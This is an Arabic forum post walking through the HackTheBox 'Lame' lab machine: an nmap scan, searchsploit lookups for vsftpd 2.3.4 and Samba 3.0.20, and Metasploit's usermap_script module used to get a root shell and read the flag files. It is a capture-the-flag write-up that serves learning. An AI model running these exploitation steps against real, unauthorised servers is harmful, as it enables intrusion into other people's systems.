مضى على الشبكة و يوم من العطاء.

HackTheBox Lame بالعربي

Malzureedi

.:: اداري سابق ::.
.:: اداري سابق ::.

السمعة:

1 -نبدأ فحص الماشين بإستخدام أداة nmap
nmap -sC -sV -Pn 10.129.191.102

assets%2F-MhZ07RuPoyXIbUUlXIO%2F-MhZ0HmOjGQekdknrX-g%2F-MhZEC0lVbSjAH-meJvy%2Fnmap_1.png


assets%2F-MhZ07RuPoyXIbUUlXIO%2F-MhZ0HmOjGQekdknrX-g%2F-MhZGoyiKM7ivwbwLsvG%2Fnmap_2.png

2 - كما نلاحظ من نتائج البحث من أداة nmap أنك هناك 4 بورتات مفتوحة بالبحث عن exploit بإستخدام أداة searchsploit
searchsploit vsftpd 2.3.4
searchsploit samba 3.0.20
3 - نبحث عن الثغرات باستخدام searchsploit
searchsploit <option>

assets%2F-MhZ07RuPoyXIbUUlXIO%2F-MhZ0HmOjGQekdknrX-g%2F-MhZIcnaAIbpAeBUj9C4%2Fserachploit_1.png

4 - حاولت إستغلال بورت 21 ftp و الثغرة backdoor command باستخدام ميتاسبلويت و أيضا بحثت في غوغل ووجدت سكربت بايثون و لم أصل الى نتيجة معه و هذا رابط سكربت https://github.com/ahervias77/vsftpd-2.3.4-exploit
5- لذلك انتقلت الى بورت 139,445 موجود عليه samba نجد ثغرة يمكن استغلالها Metasploit

6 - نقوم بتشغيل Metasploit

msfconsole

search Samba 3.0.20 < 3.0.25rc3

7 - نستخدم هذه الأوامر مع Metasploit

search Samba 3.0.20 < 3.0.25rc3 use exploit/multi/samba/usermap_script او يمكنك استخدام هذا الأمر use 0 set rhosts set lhost run
1700519981295.png


8 - نكون حصلنا على shell
1700519985659.png


9 - كما نرى أن لدينا صلاحيات root اﻷن نبحث عن Flags نستخدم أمر find

find -type f -name user.txt find -type f -name root.txt

10 - استخدم أمر cat لعرض محتوى الملف

cat /home/makis/user.txt
cat /root/root.txt
 
التعديل الأخير:

آخر المشاركات

عودة
أعلى